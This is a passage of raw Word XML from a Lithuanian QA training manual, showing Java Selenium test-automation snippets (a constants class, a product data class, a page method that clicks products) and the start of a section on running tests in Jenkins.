        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>GEROSIOS PRAKTIKOS</w:t>
      </w:r>
      <w:r w:rsidR="00DE6655">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9D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Bendrai naudojami kintamieji:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F087E" w:rsidRPr="00AD4464" w:rsidRDefault="005F087E" w:rsidP="00372B3A">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1"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="895" w:name="_Toc14393087"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>package com.automation.qa.testproject;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="895"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="896" w:name="_Toc14393088"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>public class CommonVariables {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="896"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="897" w:name="_Toc14393089"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>public static final String FILENAME = "src/test/resources/txtItems.txt";</w:t>
            </w:r>
            <w:bookmarkEnd w:id="897"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:bookmarkStart w:id="898" w:name="_Toc14393090"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>public static final String DESKTOPS = "Desktops";</w:t>
            </w:r>
            <w:bookmarkEnd w:id="898"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:bookmarkStart w:id="899" w:name="_Toc14393091"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>public static final String LAPTOPS = "Laptops &amp; Notebooks";</w:t>
            </w:r>
            <w:bookmarkEnd w:id="899"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="900" w:name="_Toc14393092"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="900"/>
          </w:p>
          <w:p w:rsidR="000E5A3D" w:rsidRPr="00AD4464" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Bendra klasė: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00735282" w:rsidRPr="00AD4464" w:rsidRDefault="00735282"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1"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="901" w:name="_Toc14393093"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public class iPhone {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="90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2" w:name="_Toc14393094"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private String price;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="90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3" w:name="_Toc14393095"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private String brand;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="90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4" w:name="_Toc14393096"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private String productCode;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="90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5" w:name="_Toc14393097"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>//--- getters -------------------------------------</w:t>
            </w:r>
            <w:bookmarkEnd w:id="90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6" w:name="_Toc14393098"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public String getBrand() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="90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07" w:name="_Toc14393099"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>return brand;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="90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8" w:name="_Toc14393100"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="90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09" w:name="_Toc14393101"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public String getPrice() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="90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10" w:name="_Toc14393102"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>return price;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="91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1" w:name="_Toc14393103"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="91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2" w:name="_Toc14393104"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public String getProductCode() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="91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13" w:name="_Toc14393105"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>return productCode;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="91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4" w:name="_Toc14393106"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="91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5" w:name="_Toc14393107"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>//--- setters -------------------------------------</w:t>
            </w:r>
            <w:bookmarkEnd w:id="915"/>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6" w:name="_Toc14393108"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void setBrand(String newValue) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="91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lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="917" w:name="_Toc14393109"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>brand = newValue;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="91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8" w:name="_Toc14393110"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="91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19" w:name="_Toc14393111"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void setPrice(String newValue) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="91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20" w:name="_Toc14393112"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>price = newValue;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="92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1" w:name="_Toc14393113"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="92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2" w:name="_Toc14393114"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void setProductCode(String newValue) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="92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23" w:name="_Toc14393115"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>productCode = newValue;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="92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4" w:name="_Toc14393116"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="924"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="925" w:name="_Toc14393117"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="925"/>
          </w:p>
          <w:p w:rsidR="000E5A3D" w:rsidRPr="00AD4464" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pP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Puslapio metodų pavyzdys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00735282" w:rsidRPr="00AD4464" w:rsidRDefault="00735282" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="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0E5A3D" w:rsidRPr="00AD4464" w:rsidTr="00335DF0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="926" w:name="_Toc14393118"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>List&lt;WebElement&gt; group = driver.findElements(By.xpath("//div[contains(@class, 'product-layout')]"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="926"/>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7" w:name="_Toc14393119"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>int numberOfItems = group.size();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="927"/>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8" w:name="_Toc14393120"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement currentItem;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="928"/>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bookmarkStart w:id="929" w:name="_Toc14393121"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>for (int i = 0; i &lt; numberOfItems; i++) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="929"/>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30" w:name="_Toc14393122"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>currentItem = group.get(i);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="930"/>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31" w:name="_Toc14393123"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>if (currentItem.findElement(By.tagName("h4")).getText().equals(item)) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="931"/>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932" w:name="_Toc14393124"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>currentItem.findElement(By.tagName("button")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="932"/>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933" w:name="_Toc14393125"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WaitIsScriptFinished.scriptFinished(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="933"/>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r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="934" w:name="_Toc14393126"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="934"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="935" w:name="_Toc14393127"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="935"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="936" w:name="_Toc14393128"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="936"/>
          </w:p>
          <w:p w:rsidR="000E5A3D" w:rsidRPr="00AD4464" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00463CAD" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2.7.</w:t>
      </w:r>
      <w:r w:rsidR="00360064">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Naudoti nuolatinės integracijos tarnybinę stotį automatinių testų vykdymui ir stebėjimui.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00463CAD" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> TESTŲ AUTOMATINIS PALEIDIMAS JENKINS SISTEMOJE</w:t>
      </w:r>
      <w:r w:rsidR="003739DB">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pavyzdys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Tam, kad turėtumėte testus vykdomus per Jenkins sistemą, jums reikia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sukurti naują ‘darbą’ Jenkins sistemoje;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7121352A" wp14:editId="2201924F">
            <wp:extent cx="1219200" cy="1656715"/>
